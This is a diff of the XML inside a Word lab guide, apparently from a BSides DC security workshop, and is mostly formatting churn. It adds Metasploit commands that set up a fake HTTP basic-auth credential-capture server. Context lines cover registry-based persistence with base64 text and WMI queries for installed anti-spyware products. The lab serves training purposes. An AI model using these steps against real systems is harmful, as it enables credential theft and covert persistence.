-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%4."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%5."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%6."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="4320" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="decimal"/>
-      <w:lvlText w:val="%7."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerLetter"/>
-      <w:lvlText w:val="%8."/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="lowerRoman"/>
-      <w:lvlText w:val="%9."/>
-      <w:lvlJc w:val="right"/>
-      <w:pPr>
-        <w:ind w:left="6480" w:hanging="180"/>
-      </w:pPr>
-    </w:lvl>
-  </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24">
     <w:nsid w:val="6D61655F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="B5A28342"/>
@@ -12423,7 +12169,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25">
+  <w:abstractNum w:abstractNumId="24">
     <w:nsid w:val="71324A9B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E0166D64"/>
@@ -12536,7 +12282,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="26">
+  <w:abstractNum w:abstractNumId="25">
     <w:nsid w:val="7B9B330D"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3C2AA624"/>
@@ -12622,7 +12368,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="27">
+  <w:abstractNum w:abstractNumId="26">
     <w:nsid w:val="7ECE0706"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="3C2AA624"/>
@@ -12708,7 +12454,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="28">
+  <w:abstractNum w:abstractNumId="27">
     <w:nsid w:val="7FFA788C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="150A8FCA"/>
@@ -12813,7 +12559,7 @@
     <w:abstractNumId w:val="8"/>
   </w:num>
   <w:num w:numId="7">
-    <w:abstractNumId w:val="28"/>
+    <w:abstractNumId w:val="27"/>
   </w:num>
   <w:num w:numId="8">
     <w:abstractNumId w:val="17"/>
@@ -12843,7 +12589,7 @@
     <w:abstractNumId w:val="18"/>
   </w:num>
   <w:num w:numId="17">
-    <w:abstractNumId w:val="27"/>
+    <w:abstractNumId w:val="26"/>
   </w:num>
   <w:num w:numId="18">
     <w:abstractNumId w:val="21"/>
@@ -12855,43 +12601,43 @@
     <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="21">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
   </w:num>
   <w:num w:numId="22">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="23">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="24">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="25">
-    <w:abstractNumId w:val="26"/>
+    <w:abstractNumId w:val="25"/>
   </w:num>
   <w:num w:numId="26">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="27">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="28">
-    <w:abstractNumId w:val="24"/>
+    <w:abstractNumId w:val="23"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -12912,10 +12658,7 @@
     <w:abstractNumId w:val="6"/>
   </w:num>
   <w:num w:numId="34">
-    <w:abstractNumId w:val="25"/>
-  </w:num>
-  <w:num w:numId="35">
-    <w:abstractNumId w:val="23"/>
+    <w:abstractNumId w:val="24"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="30"/>
 </w:numbering>
@@ -14105,7 +13848,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BE9C7F7D-8037-1844-91DB-39B0218BA820}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{82565B03-18D1-8743-9695-B32799A80D7E}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Labs_BSidesDC_V1.docx
+++ b/Labs_BSidesDC_V1.docx
@@ -6,8 +6,6 @@
       <w:pPr>
         <w:pStyle w:val="Style1"/>
       </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Heading1Char"/>
@@ -1735,11 +1733,11 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shapetype id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
+              <v:shapetype w14:anchorId="783227B9" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m0,0l0,21600,21600,21600,21600,0xe">
                 <v:stroke joinstyle="miter"/>
                 <v:path gradientshapeok="t" o:connecttype="rect"/>
               </v:shapetype>
-              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:170.9pt;margin-top:172.8pt;width:106.4pt;height:21.7pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:170.9pt;margin-top:172.8pt;width:106.4pt;height:21.7pt;z-index:251667456;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -1830,7 +1828,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:174pt;margin-top:74.95pt;width:103.3pt;height:21.7pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
+              <v:shape w14:anchorId="00D4A123" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:174pt;margin-top:74.95pt;width:103.3pt;height:21.7pt;z-index:251664384;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:200;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:200;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" stroked="f">
                 <v:textbox style="mso-fit-shape-to-text:t">
                   <w:txbxContent>
                     <w:p>
@@ -6287,7 +6285,18 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Use WMI to query if you have any anti-spyware products installed on your machine</w:t>
+        <w:t>Use WMI to query if you have</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CharacterStyle1"/>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> any anti-spyware products installed on your machine</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9731,11 +9740,9 @@
       <w:r>
         <w:t xml:space="preserve">A form of </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>persistance</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>persistence</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> is to save base64 encoded text into a registry value. The command would look something like: </w:t>
       </w:r>
@@ -9964,13 +9971,248 @@
       <w:pPr>
         <w:pStyle w:val="ListParagraph"/>
         <w:numPr>
-          <w:ilvl w:val="1"/>
+          <w:ilvl w:val="3"/>
           <w:numId w:val="31"/>
         </w:numPr>
-        <w:ind w:left="2520"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Need to get this from my home machine which is done</w:t>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="560"/>
+          <w:tab w:val="left" w:pos="1120"/>
+          <w:tab w:val="left" w:pos="1680"/>
+          <w:tab w:val="left" w:pos="2240"/>
+          <w:tab w:val="left" w:pos="2800"/>
+          <w:tab w:val="left" w:pos="3360"/>
+          <w:tab w:val="left" w:pos="3920"/>
+          <w:tab w:val="left" w:pos="4480"/>
+          <w:tab w:val="left" w:pos="5040"/>
+          <w:tab w:val="left" w:pos="5600"/>
+          <w:tab w:val="left" w:pos="6160"/>
+          <w:tab w:val="left" w:pos="6720"/>
+        </w:tabs>
+        <w:kinsoku/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>use auxiliary/server/capture/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>http_basic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="560"/>
+          <w:tab w:val="left" w:pos="1120"/>
+          <w:tab w:val="left" w:pos="1680"/>
+          <w:tab w:val="left" w:pos="2240"/>
+          <w:tab w:val="left" w:pos="2800"/>
+          <w:tab w:val="left" w:pos="3360"/>
+          <w:tab w:val="left" w:pos="3920"/>
+          <w:tab w:val="left" w:pos="4480"/>
+          <w:tab w:val="left" w:pos="5040"/>
+          <w:tab w:val="left" w:pos="5600"/>
+          <w:tab w:val="left" w:pos="6160"/>
+          <w:tab w:val="left" w:pos="6720"/>
+        </w:tabs>
+        <w:kinsoku/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>RedirectURL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> www.google.com</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="560"/>
+          <w:tab w:val="left" w:pos="1120"/>
+          <w:tab w:val="left" w:pos="1680"/>
+          <w:tab w:val="left" w:pos="2240"/>
+          <w:tab w:val="left" w:pos="2800"/>
+          <w:tab w:val="left" w:pos="3360"/>
+          <w:tab w:val="left" w:pos="3920"/>
+          <w:tab w:val="left" w:pos="4480"/>
+          <w:tab w:val="left" w:pos="5040"/>
+          <w:tab w:val="left" w:pos="5600"/>
+          <w:tab w:val="left" w:pos="6160"/>
+          <w:tab w:val="left" w:pos="6720"/>
+        </w:tabs>
+        <w:kinsoku/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>srvport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 80</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="560"/>
+          <w:tab w:val="left" w:pos="1120"/>
+          <w:tab w:val="left" w:pos="1680"/>
+          <w:tab w:val="left" w:pos="2240"/>
+          <w:tab w:val="left" w:pos="2800"/>
+          <w:tab w:val="left" w:pos="3360"/>
+          <w:tab w:val="left" w:pos="3920"/>
+          <w:tab w:val="left" w:pos="4480"/>
+          <w:tab w:val="left" w:pos="5040"/>
+          <w:tab w:val="left" w:pos="5600"/>
+          <w:tab w:val="left" w:pos="6160"/>
+          <w:tab w:val="left" w:pos="6720"/>
+        </w:tabs>
+        <w:kinsoku/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">set </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>ssl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> false </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="31"/>
+        </w:numPr>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="560"/>
+          <w:tab w:val="left" w:pos="1120"/>
+          <w:tab w:val="left" w:pos="1680"/>
+          <w:tab w:val="left" w:pos="2240"/>
+          <w:tab w:val="left" w:pos="2800"/>
+          <w:tab w:val="left" w:pos="3360"/>
+          <w:tab w:val="left" w:pos="3920"/>
+          <w:tab w:val="left" w:pos="4480"/>
+          <w:tab w:val="left" w:pos="5040"/>
+          <w:tab w:val="left" w:pos="5600"/>
+          <w:tab w:val="left" w:pos="6160"/>
+          <w:tab w:val="left" w:pos="6720"/>
+        </w:tabs>
+        <w:kinsoku/>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="000000"/>
+          <w:spacing w:val="0"/>
+        </w:rPr>
+        <w:t>set URIPATH /</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9983,7 +10225,6 @@
         <w:ind w:left="1800"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Put a copy of Invoke-</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
@@ -10065,13 +10306,11 @@
         <w:ind w:left="1800"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">If bullet five was </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>If bullet five was to</w:t>
+      </w:r>
+      <w:r>
+        <w:t>o</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> long, use search-keys</w:t>
       </w:r>
@@ -10762,7 +11001,7 @@
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
       </w:rPr>
     </w:lvl>
-    <w:lvl w:ilvl="1" w:tplc="04090003" w:tentative="1">
+    <w:lvl w:ilvl="1" w:tplc="04090003">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
       <w:lvlText w:val="o"/>
@@ -11795,7 +12034,7 @@
         <w:ind w:left="1440" w:hanging="360"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+    <w:lvl w:ilvl="2" w:tplc="0409001B">
       <w:start w:val="1"/>
       <w:numFmt w:val="lowerRoman"/>
       <w:lvlText w:val="%3."/>
@@ -11804,7 +12043,7 @@
         <w:ind w:left="2160" w:hanging="180"/>
       </w:pPr>
     </w:lvl>
-    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+    <w:lvl w:ilvl="3" w:tplc="0409000F">
       <w:start w:val="1"/>
       <w:numFmt w:val="decimal"/>
       <w:lvlText w:val="%4."/>
@@ -13848,7 +14087,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{82565B03-18D1-8743-9695-B32799A80D7E}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7FFBDBCA-ED70-DE49-B95D-77D930376EAA}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>
